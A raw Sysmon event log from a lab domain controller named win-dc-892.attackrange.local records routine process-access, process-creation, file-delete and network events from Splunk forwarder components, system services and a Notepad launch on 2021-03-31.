10341000x800000000000000010611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.944{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.865{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.865{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.740{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E58BE6FCAB49A96B91209191C90275D,SHA256=16CFE8C51F60CCB1D949BA166A83B5A72AA004B503E801432756EAF3E3EC2D56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.771{266CAFBE-665F-6064-6901-00000000AE01}67406736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.756{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=529DC9F55DD4662AE953EC69B0738C67,SHA256=44C665755A07602A6F64BEDB90DE557D6C4F19DF7F897CCE12BAD83414E3113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:03.615{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.615{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.616{266CAFBE-665F-6064-6901-00000000AE01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.974{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:03.491{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53706-false10.0.1.12-8000- 23542300x800000000000000010639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.787{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7292A7B2B51D21774A8EA60EFC58CBC8,SHA256=458711C8E9B149F8D1D6AA6F7574313DDB1B5545948676D1832334AF3C4AC3F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:04.709{266CAFBE-64C5-6064-A500-00000000AE01}43565668C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+17d35c|C:\Windows\System32\SHELL32.dll+1981d8|C:\Windows\System32\SHELL32.dll+2845d3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17d600 154100x800000000000000010632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.716{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" 